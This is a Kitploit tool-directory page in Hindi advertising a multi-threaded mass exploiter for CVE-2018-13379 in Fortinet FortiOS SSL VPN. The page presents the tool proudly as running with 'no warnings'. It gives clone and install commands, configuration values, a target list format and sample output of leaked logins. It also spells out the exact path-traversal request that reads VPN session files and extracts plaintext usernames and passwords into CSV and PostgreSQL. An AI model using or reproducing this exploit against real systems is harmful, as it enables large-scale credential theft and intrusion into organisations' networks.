Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — CVE-2018-13379 फोर्टिनेट फोर्टिओएस एसएसएल वीपीएन के लिए बड़े पैमाने पर शोषण उपकरण। क्रेडेंशियल्स को तुरंत निकालता है, सीएसवी + पोस्टग्रेएसक्यूएल में सहेजता है। मल्टी-थ्रेडेड, कोई बकवास चेतावनी नहीं। | Kitploit
उपकरण/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubinstructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

CVE-2018-13379 फोर्टिनेट फोर्टिओएस एसएसएल वीपीएन के लिए बड़े पैमाने पर शोषण उपकरण। क्रेडेंशियल्स को तुरंत निकालता है, सीएसवी + पोस्टग्रेएसक्यूएल में सहेजता है। मल्टी-थ्रेडेड, कोई बकवास चेतावनी नहीं।

रिपॉजिटरी देखें
123 महीने पहलेअभी तक समीक्षित नहीं

पूर्वावलोकन

CVE-2018-13379 — Fortinet FortiOS SSL VPN के लिए बड़े पैमाने पर शोषण उपकरण

Fortinet FortiOS SSL VPN में CVE-2018-13379 (पथ भ्रमण) भेद्यता के बड़े पैमाने पर शोषण के लिए एक उपकरण। सत्र फ़ाइलों को पढ़ने और लॉगिन और पासवर्ड को स्पष्ट पाठ में निकालने की अनुमति देता है।

विशेषताएँ

  • /remote/fgt_lang endpoint के माध्यम से CVE-2018-13379 का शोषण
  • मल्टीथ्रेडिंग (डिफ़ॉल्ट रूप से 20 थ्रेड)
  • मिले क्रेडेंशियल्स का CSV और PostgreSQL में तत्काल सहेजना
  • टाइमस्टैम्प के साथ PostgreSQL में गतिशील तालिका नाम (fortios_creds_20250120_143052)
  • कोई चेतावनी नहीं - केवल परिणाम

स्थापना

root@kitploit:~
git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

कॉन्फ़िगरेशन

सभी सेटिंग्स सीधे स्क्रिप्ट में संपादन योग्य हैं - कमांड लाइन आर्गुमेंट्स लाइनों से कोई छेड़छाड़ नहीं:

root@kitploit:~
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file

PostgreSQL (वैकल्पिक - स्क्रिप्ट डेटाबेस के बिना काम करती है)

root@kitploit:~
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

उपयोग

  1. लक्ष्यों के साथ एक फ़ाइल targets.txt बनाएँ, प्रति पंक्ति एक:
root@kitploit:~
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. स्क्रिप्ट चलाएँ:
root@kitploit:~
python3 exploit.py

परिणाम

  • CSV फ़ाइल — सभी मिले क्रेडेंशियल्स टाइमस्टैम्प के साथ
  • PostgreSQL तालिका — प्रत्येक रन पर एक नई तालिका बनाई जाती है (fortios_creds_YYYYMMDD_HHMMSS)

उदाहरण आउटपुट:

root@kitploit:~
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443

यह कैसे काम करता है

  1. https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession पते पर GET अनुरोध भेजा जाता है
  2. प्रतिक्रिया में यह जाँच की जाती है कि क्या इसमें स्ट्रिंग var fgt_lang है (भेद्यता का संकेत)
  3. बाइनरी प्रतिक्रिया से username और password जोड़े निकाले जाते हैं
  4. मिला डेटा तुरंत CSV और PostgreSQL में सहेजा जाता है
  5. स्क्रिप्ट अगले लक्ष्य पर चली जाती है।

आवश्यकताएँ

  • Python 3.6+
  • requests
  • psycopg2-binary (वैकल्पिक - इसके बिना केवल CSV फ़ाइलें काम करती हैं)
  • urllib3

चेतावनी

यह उपकरण शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।

श्रेय

  • मूल भेद्यता मेह चांग द्वारा खोजी गई
  • शोषण तर्क सार्वजनिक रूप से उपलब्ध शोध पर आधारित है

लाइसेंस

Unlicense - जो चाहे वो करें।

टूल डाउनलोड करें